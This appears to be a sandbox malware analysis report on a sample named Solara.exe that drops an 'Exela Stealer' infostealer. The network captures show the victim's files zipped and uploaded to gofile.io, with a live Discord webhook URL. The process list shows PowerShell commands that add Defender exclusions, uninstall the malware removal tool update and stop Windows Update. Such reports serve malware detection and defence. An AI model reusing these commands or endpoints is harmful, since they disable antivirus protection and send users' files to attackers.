                                                                                                  2025-01-12 06:11:29 UTC16384OUTData Raw: d1 9a de a2 ec 1e 6f 5a 55 fe d1 16 fe a6 ef 4b f5 41 b0 fe 77 b9 e6 14 73 1c 5c 44 5a 1c e5 7e 5c e6 20 f3 93 07 ab 4b 94 2c 25 24 45 3f 16 2d ec 5d b4 79 e9 7e ec d3 f0 4a eb df 2d 65 b7 cc a2 c4 44 9b f1 01 f3 85 eb de 51 35 6e b4 70 cb e2 25 33 ff b1 5f 59 85 92 bd 63 43 31 7e 54 b4 ab 99 e3 c9 0f f9 bd 50 9d 14 da 26 a1 b0 9f 1b b4 e8 39 69 cf 6b ab 56 b9 0a 25 e2 3a 31 2b f5 87 9b 79 77 47 15 07 75 a8 09 6b c9 a4 43 b3 36 84 ce e1 d6 b9 2f 84 3d 25 7a c5 5f c8 73 37 e8 eb 59 e3 b3 2c 18 1b f4 6b 3d fa 19 73 f0 7a 9b cd ce 2f ac ea 51 d8 da 84 18 bd 6b ad aa 97 20 c1 14 4d 23 94 39 88 74 99 75 27 03 98 0b e6 d8 9e 4f 5d 16 69 85 09 00 02 60 93 c2 af 40 7b 0d aa b9 bd 5a d6 2b 1f 81 d9 2a 04 64 52 86 5e 25 0d f8 51 07 2f 2a 00 79 b4 83 0e 73 74 ff e1
                                                                                                  Data Ascii: oZUKAws\DZ~\ K,%$E?-]y~J-eDQ5np%3_YcC1~TP&9ikV%:1+ywGukC6/=%z_s7Y,k=sz/Qk M#9tu'O]i`@{Z+*dR^%Q/*yst
                                                                                                  2025-01-12 06:11:29 UTC16384OUTData Raw: 31 2a 1d e4 6a 9f 89 2e 9d da f4 3d c7 03 1f de db 9b 91 3f 66 5a 4b aa dd ee c6 ad 3b 92 21 f5 e2 50 aa 7a f9 66 cd 55 f5 f2 fb 1d 85 54 5d cd 4e 2d 22 c7 d1 f8 75 6d 66 8d ac 6f 44 71 e3 26 45 ce a2 e7 f1 c5 33 bc 0d 21 ad e7 52 4f 07 69 75 e6 f1 95 f1 e6 b6 05 aa 80 16 2a 2d 41 59 f1 cd f6 f7 1a fd 62 8f 80 7d 4f 68 4e 0d e6 0f 8d aa 66 0b 3d b4 81 48 a3 34 ec 6c 84 6e 57 f9 58 6b f2 05 4f 3e a0 fe d1 d9 3a 2e fb b2 75 22 cd dd e8 e1 af c7 df 19 25 54 6d fc ed 63 9a ca 87 d1 e0 86 91 b7 6d 23 ee 27 bc b3 c5 3d 80 cd f0 38 eb 7c 69 57 e9 1a eb 6e d1 ec d2 23 f2 d6 66 44 bd eb 57 03 b1 31 bd 79 f9 55 c5 a7 8a 67 b5 fb 6a f3 f5 02 0e a0 c5 21 3b d1 30 8b d9 c7 17 7d e2 54 18 55 6f 5a 8c c7 ba 1f ac e8 9e a9 e5 eb ae a3 da e7 d0 cc be 51 2a 9d e3 be 13 7a
                                                                                                  Data Ascii: 1*j.=?fZK;!PzfUT]N-"umfoDq&E3!ROiu*-AYb}OhNf=H4lnWXkO>:.u"%Tmcm#'=8|iWn#fDW1yUgj!;0}TUoZQ*z
                                                                                                  2025-01-12 06:11:29 UTC16384OUTData Raw: d2 bc f8 b1 82 b4 33 76 18 84 ae 7e c3 e4 8a 7b 45 ea 5f 4b 46 60 0f df de 5c 35 86 34 f2 40 06 53 b8 f7 9c 07 c2 23 d1 da 3f 87 61 e4 74 4e bc c9 5c 83 14 44 30 ac 7c 7e f9 1c 8f 87 4b 15 d3 57 2c fd ce 9b e0 b6 fd d3 c2 c4 7e c4 c9 b9 e6 a5 10 8d 7d f4 e1 78 21 c6 97 de b4 05 22 d7 20 4c a7 07 08 5a 16 8b 45 ca 40 0a c2 6b 2a 79 17 d7 29 f7 f7 1d ae 75 4d eb 67 cc 37 87 09 e7 ed fd 9f c1 fd 15 2b 13 7b 6e 13 44 62 bf 25 5d 11 c9 c8 e9 d8 d7 52 3e af 23 fd 7c e4 92 91 5b 2d 12 fb d3 f4 66 aa c4 fe 9a f0 fd 35 5f af 8f d3 12 62 03 5b 97 e8 8d 2b 58 2b 7a 0d f9 2b a6 2c e5 51 b3 2a 6e 24 e4 e5 78 4b c9 60 83 e6 23 4d fd 50 ba 3f 72 82 18 9d 75 d9 db d1 77 fc ea 1a b1 ba 2c 47 11 13 b6 dd 59 5d 85 b1 25 95 dd 9a bc 4a d4 7c 9d d4 71 f8 65 b3 1e 5e b5 68 d9
                                                                                                  Data Ascii: 3v~{E_KF`\54@S#?atN\D0|~KW,~}x!" LZE@k*y)uMg7+{nDb%]R>#|[-f5_b[+X+z+,Q*n$xK`#MP?ruw,GY]%J|qe^h
2025-01-12 06:11:30 UTC | 833 | IN | HTTP/1.1 200 OK
                                                                                                  Date: Sun, 12 Jan 2025 06:11:30 GMT
                                                                                                  Content-Type: application/json
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                  x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                  x-ratelimit-limit: 5
                                                                                                  x-ratelimit-remaining: 4
                                                                                                  x-ratelimit-reset: 1736662291
                                                                                                  x-ratelimit-reset-after: 1
                                                                                                  vary: Accept-Encoding
                                                                                                  via: 1.1 google
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7iaXnJwus9Ix%2F41JVXRt1wTLXILw75iUASarlJSYLRCHA2%2F1E9XIuTcDQS1oQzEe0w4z%2Bmh4V8I3vv%2BdHGAiz4G7%2Bi1NF105%2BXRHCE2aRhequ1YzKQUS6Ae%2BhCBTIEbs"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 900afd4baae472a5-EWR


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49990 | 51.91.7.6 | 443 | 2980 | C:\Users\user\AppData\Local\Temp\Exela.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 06:11:31 UTC | 134 | OUT | GET /getServer HTTP/1.1
                                                                                                  Host: api.gofile.io
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  User-Agent: Python/3.10 aiohttp/3.11.11
2025-01-12 06:11:31 UTC | 1146 | IN | HTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.27.1
                                                                                                  Date: Sun, 12 Jan 2025 06:11:31 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Content-Length: 14
                                                                                                  Connection: close
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                  Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                  Origin-Agent-Cluster: ?1
                                                                                                  Referrer-Policy: no-referrer
                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-DNS-Prefetch-Control: off
                                                                                                  X-Download-Options: noopen
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                                                  X-XSS-Protection: 0
                                                                                                  ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
                                                                                                  X-Robots-Tag: noindex, nofollow
2025-01-12 06:11:31 UTC | 14 | IN | Data Raw: 65 72 72 6f 72 2d 6e 6f 74 46 6f 75 6e 64
                                                                                                  Data Ascii: error-notFound


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49991 | 45.112.123.227 | 443 | 2980 | C:\Users\user\AppData\Local\Temp\Exela.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 06:11:32 UTC | 240 | OUT | POST /uploadFile HTTP/1.1
                                                                                                  Host: store1.gofile.io
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  User-Agent: Python/3.10 aiohttp/3.11.11
                                                                                                  Content-Length: 37581
                                                                                                  Content-Type: multipart/form-data; boundary=d5594edab89946da91a68a41e5383196
2025-01-12 06:11:32 UTC | 36 | OUT | Data Raw: 2d 2d 64 35 35 39 34 65 64 61 62 38 39 39 34 36 64 61 39 31 61 36 38 61 34 31 65 35 33 38 33 31 39 36 0d 0a
                                                                                                  Data Ascii: --d5594edab89946da91a68a41e5383196
2025-01-12 06:11:32 UTC | 127 | OUT | Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 7a 69 70 2d 63 6f 6d 70 72 65 73 73 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 74 65 61 6c 65 64 46 69 6c 65 73 42 79 45 78 65 6c 61 2e 7a 69 70 22 0d 0a 0d 0a
                                                                                                  Data Ascii: Content-Type: application/x-zip-compressedContent-Disposition: form-data; name="file"; filename="StealedFilesByExela.zip"
                                                                                                  2025-01-12 06:11:32 UTC16384OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 6f 09 2c 5a 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 44 65 73 6b 74 6f 70 2f 50 4b 03 04 14 00 00 00 00 00 6f 09 2c 5a 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 00 44 6f 63 75 6d 65 6e 74 73 2f 50 4b 03 04 14 00 00 00 00 00 6f 09 2c 5a 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 00 44 6f 77 6e 6c 6f 61 64 73 2f 50 4b 03 04 14 00 00 00 00 00 6f 09 2c 5a 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 4c 46 4f 50 4f 44 47 56 4f 48 2f 50 4b 03 04 14 00 00 00 00 00 6f 09 2c 5a 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 4c 49 4a 44 53 46 4b 4a 5a 47 2f 50 4b 03 04 14 00 00 00 08 00 d6 1e 45 57 52 e3 0d dc 83 02 00 00 02 04 00 00 16 00 00 00 44 65 73 6b 74 6f 70 2f 41 51 52 46 45 56 52 54 47 4c 2e 6a 70 67 15 93 47
                                                                                                  Data Ascii: PKo,ZDesktop/PKo,ZDocuments/PKo,ZDownloads/PKo,ZLFOPODGVOH/PKo,ZLIJDSFKJZG/PKEWRDesktop/AQRFEVRTGL.jpgG
                                                                                                  2025-01-12 06:11:32 UTC16384OUTData Raw: 9e de 54 7f dc a5 22 aa 9f 8f ab e5 3b fb 9c cb 97 b5 ac b7 0b dc 9c 6e 33 45 cb 9d d3 9c a3 d4 92 e9 02 b6 6f 05 ab 7a 14 50 73 62 15 a8 ec 31 75 1a 89 e3 95 d9 55 50 3e 1d c2 e9 95 22 3f e3 ee d0 a5 df 50 a3 92 78 d5 ea 41 ea 4c 82 ac d1 77 5c 00 4e 8b 99 86 4e 3d 28 34 72 fa b0 ed dc de 75 97 4e ee b1 c2 74 cd 65 62 20 7d 63 f9 22 80 76 ad 0e 7f 7c 78 af 94 13 42 e8 2d 61 e4 f9 99 8d 11 44 f1 c8 e0 c2 a7 7d 41 95 f6 fa 94 ad c3 80 ef 15 94 a9 55 2b 80 b4 f5 55 06 63 70 89 8a 87 34 a2 6e 86 2c 4c 6c c5 c6 a8 42 05 e9 7e 6b ae 1f ee e8 c6 d8 82 d2 ee b0 66 39 71 cf 93 b0 5c 31 9b e0 8c b3 bc b3 23 9f e0 8f 31 03 9b cd 66 24 db ac fe 02 6f b7 2c 6f 8f cb 7c 98 27 59 dc 55 7a ef 5c 55 9f 1f 5d f5 12 71 2c db 5d 55 75 5a f9 dd 19 2e 6f 38 59 51 e1 c6 e9 df
                                                                                                  Data Ascii: T";n3EozPsb1uUP>"?PxALw\NN=(4ruNteb }c"v|xB-aD}AU+Ucp4n,LlB~kf9q\1#1f$o,o|'YUz\U]q,]UuZ.o8YQ
                                                                                                  2025-01-12 06:11:32 UTC4610OUTData Raw: f4 42 1e 3c a5 f7 1d 09 e2 0b 62 0b 99 94 15 e6 f0 65 2b af d6 d1 cd 13 0e a6 a9 8e 9b 9b f6 07 35 fa 3c db 5c 93 e9 e5 ea 9f 5f 39 12 8f 52 1c 7c da b9 af e1 77 96 e2 47 7f bb 6f bd 3f 47 8a c5 97 e3 6d da 62 3e a2 6b 66 32 6b c1 32 b1 d5 16 77 71 9e 9e 69 74 95 f0 a9 8a e7 57 70 67 ac f3 89 ba bf b0 5b 17 4e 9a d4 96 0c aa 0c 56 a6 7c 76 ab 4d b5 db 83 ad 5e 73 9d 3f f5 3b fc e6 52 06 58 bd d6 fe c2 ca e9 67 e7 57 f1 e6 a3 ab e7 9b 91 37 e1 13 3d 35 cf e2 6c 31 af d5 10 31 62 7f 18 02 a3 f5 6b 61 5e 0a f5 25 91 d1 b3 75 e7 5b 88 40 36 c4 c2 9e 82 46 b2 3d e2 26 7f e5 63 b9 75 84 d0 96 3a c5 06 64 a8 19 91 55 35 75 17 f0 31 bc f2 75 ca 0a 12 19 a9 85 92 9d e0 8d 6c ab 6f de a3 da 2e 62 42 be 49 eb 39 4c e9 49 9d 70 7f 7f ff 50 4b 03 04 14 00 00 00 08 00
                                                                                                  Data Ascii: B<be+5<\_9R|wGo?Gmb>kf2k2wqitWpg[NV|vM^s?;RXgW7=5l11bka^%u[@6F=&cu:dU5u1ulo.bBI9LIpPK
2025-01-12 06:11:32 UTC | 2 | OUT | Data Raw: 0d 0a
                                                                                                  Data Ascii:
2025-01-12 06:11:32 UTC | 38 | OUT | Data Raw: 2d 2d 64 35 35 39 34 65 64 61 62 38 39 39 34 36 64 61 39 31 61 36 38 61 34 31 65 35 33 38 33 31 39 36 2d 2d 0d 0a
                                                                                                  Data Ascii: --d5594edab89946da91a68a41e5383196--
2025-01-12 06:11:34 UTC | 449 | IN | HTTP/1.1 200 OK
                                                                                                  Server: nginx/1.27.1
                                                                                                  Date: Sun, 12 Jan 2025 06:11:34 GMT
                                                                                                  Content-Type: application/json
                                                                                                  Content-Length: 439
                                                                                                  Connection: close
                                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
                                                                                                  Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
                                                                                                  2025-01-12 06:11:34 UTC439INData Raw: 7b 22 64 61 74 61 22 3a 7b 22 63 72 65 61 74 65 54 69 6d 65 22 3a 31 37 33 36 36 36 32 32 39 34 2c 22 64 6f 77 6e 6c 6f 61 64 50 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 66 69 6c 65 2e 69 6f 2f 64 2f 59 6f 62 74 45 30 22 2c 22 67 75 65 73 74 54 6f 6b 65 6e 22 3a 22 73 77 61 41 43 4a 59 48 51 4f 77 6b 4d 73 58 38 64 4f 68 38 53 4e 59 32 41 73 59 6f 47 42 33 66 22 2c 22 69 64 22 3a 22 39 61 38 37 65 39 32 39 2d 30 39 63 32 2d 34 35 35 32 2d 38 38 64 37 2d 35 38 39 61 38 33 61 32 36 36 30 61 22 2c 22 6d 64 35 22 3a 22 32 32 64 65 36 39 61 64 33 38 34 38 62 62 39 38 33 65 33 31 31 35 34 39 36 61 62 65 34 37 34 66 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 22 2c 22 6d 6f 64 54 69 6d 65 22 3a 31 37 33 36 36 36
                                                                                                  Data Ascii: {"data":{"createTime":1736662294,"downloadPage":"https://gofile.io/d/YobtE0","guestToken":"swaACJYHQOwkMsX8dOh8SNY2AsYoGB3f","id":"9a87e929-09c2-4552-88d7-589a83a2660a","md5":"22de69ad3848bb983e3115496abe474f","mimetype":"application/zip","modTime":173666


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49992 | 162.159.134.233 | 443 | 2980 | C:\Users\user\AppData\Local\Temp\Exela.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 06:11:35 UTC | 281 | OUT | POST /api/webhooks/1320429670621118475/ZA2SDlHOyGg_8gIHOPb_StHSHJUvDXjQVsMohQrFJXzcZqXUB4PdHnGLRGgaGXchQyP9 HTTP/1.1
                                                                                                  Host: discordapp.com
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  User-Agent: Python/3.10 aiohttp/3.11.11
                                                                                                  Content-Length: 419
                                                                                                  Content-Type: application/json
                                                                                                  2025-01-12 06:11:35 UTC419OUTData Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 20 22 45 78 65 6c 61 20 53 74 65 61 6c 65 72 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 2a 2a 2a 45 78 65 6c 61 20 53 74 65 61 6c 65 72 2a 2a 2a 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 2a 53 74 65 61 6c 65 64 20 46 69 6c 65 73 2a 2a 2a 22 2c 20 22 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 30 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 71 75 69 63 61 78 64 2f 45 78 65 6c 61 2d 56 32 2e 30 22 7d 2c 20 22 74 68 75 6d 62
                                                                                                  Data Ascii: {"username": "Exela Stealer", "embeds": [{"title": "***Exela Stealer***", "description": "***Stealed Files***", "url": "https://t.me/ExelaStealer", "color": 0, "footer": {"text": "https://t.me/ExelaStealer | https://github.com/quicaxd/Exela-V2.0"}, "thumb
2025-01-12 06:11:36 UTC | 1109 | IN | HTTP/1.1 204 No Content
                                                                                                  Date: Sun, 12 Jan 2025 06:11:36 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Connection: close
                                                                                                  Set-Cookie: __dcfduid=1465091ed0ac11efa2a502127856c73e; Expires=Fri, 11-Jan-2030 06:11:36 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                  strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                  x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                  x-ratelimit-limit: 5
                                                                                                  x-ratelimit-remaining: 4
                                                                                                  x-ratelimit-reset: 1736662296
                                                                                                  x-ratelimit-reset-after: 1
                                                                                                  via: 1.1 google
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2oS8yPWU96vVn8NMgrdPsPmD3avUBCG7SbrVlD5DQEcUcp%2FElyr9DPfiNDInuvJXypfaJXbyiF7DzX5kMOI4h5VSH2YE9z0wT3lvzByn9JCUR8aqesA9HllNLXZQ%2BhDw"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Set-Cookie: __sdcfduid=1465091ed0ac11efa2a502127856c73e4e4ca8f501534de89a75dc58d266d310b14ecab19f99a974acab6242bcb32ca7; Expires=Fri, 11-Jan-2030 06:11:36 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                  2025-01-12 06:11:36 UTC626INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 46 75 41 7a 50 4e 7a 73 4e 75 6d 46 46 41 75 6b 4d 69 4c 79 38 75 79 6b 6d 30 6e 62 74 42 46 7a 6d 5a 55 5a 43 4b 37 33 38 6a 34 2d 31 37 33 36 36 36 32 32 39 36 2d 31 2e 30 2e 31 2e 31 2d 78 30 31 4c 65 4b 70 41 62 68 5a 64 6c 64 6f 74 35 53 38 62 54 61 61 35 45 36 45 6c 79 4c 2e 64 75 2e 69 59 72 6d 68 69 55 38 74 6e 69 7a 38 69 6d 59 50 4a 4c 49 5f 4d 72 6b 5a 73 57 6f 68 75 30 6c 7a 71 6a 59 70 6f 68 46 67 46 54 4c 45 41 4a 38 70 49 79 77 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 53 75 6e 2c 20 31 32 2d 4a 61 6e 2d 32 35 20 30 36 3a 34 31 3a 33 36 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72
                                                                                                  Data Ascii: Set-Cookie: __cf_bm=FuAzPNzsNumFFAukMiLy8uykm0nbtBFzmZUZCK738j4-1736662296-1.0.1.1-x01LeKpAbhZdldot5S8bTaa5E6ElyL.du.iYrmhiU8tniz8imYPJLI_MrkZsWohu0lzqjYpohFgFTLEAJ8pIyw; path=/; expires=Sun, 12-Jan-25 06:41:36 GMT; domain=.discordapp.com; HttpOnly; Secur


Target ID: 0
Start time: 01:10:24
Start date: 12/01/2025
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Imagebase: 0x7ff7b4ee0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

                                                                                                  Target ID:1
                                                                                                  Start time:01:10:24
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Users\user\Desktop\Solara.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Users\user\Desktop\Solara.exe"
                                                                                                  Imagebase:0xd10000
                                                                                                  File size:14'390'272 bytes
                                                                                                  MD5 hash:CC6D7A6B17FEBE201B7F7D26CE944C08
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:3
                                                                                                  Start time:01:10:27
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
                                                                                                  Imagebase:0x7ff741d30000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:4
                                                                                                  Start time:01:10:27
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:7
                                                                                                  Start time:01:10:38
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\Solara.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Users\user~1\AppData\Local\Temp\Solara.exe"
                                                                                                  Imagebase:0x7ff6284a0000
                                                                                                  File size:5'527'040 bytes
                                                                                                  MD5 hash:089094590DF5698B03A7428A5864ED33
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 83%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:8
                                                                                                  Start time:01:10:39
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Exela.exe'
                                                                                                  Imagebase:0xa10000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:9
                                                                                                  Start time:01:10:39
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:10
                                                                                                  Start time:01:10:39
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                  Imagebase:0x7ff741d30000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:11
                                                                                                  Start time:01:10:40
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:12
                                                                                                  Start time:01:10:43
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                  Imagebase:0x7ff6051e0000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:13
                                                                                                  Start time:01:10:43
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                  Imagebase:0x7ff686210000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:14
                                                                                                  Start time:01:10:43
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
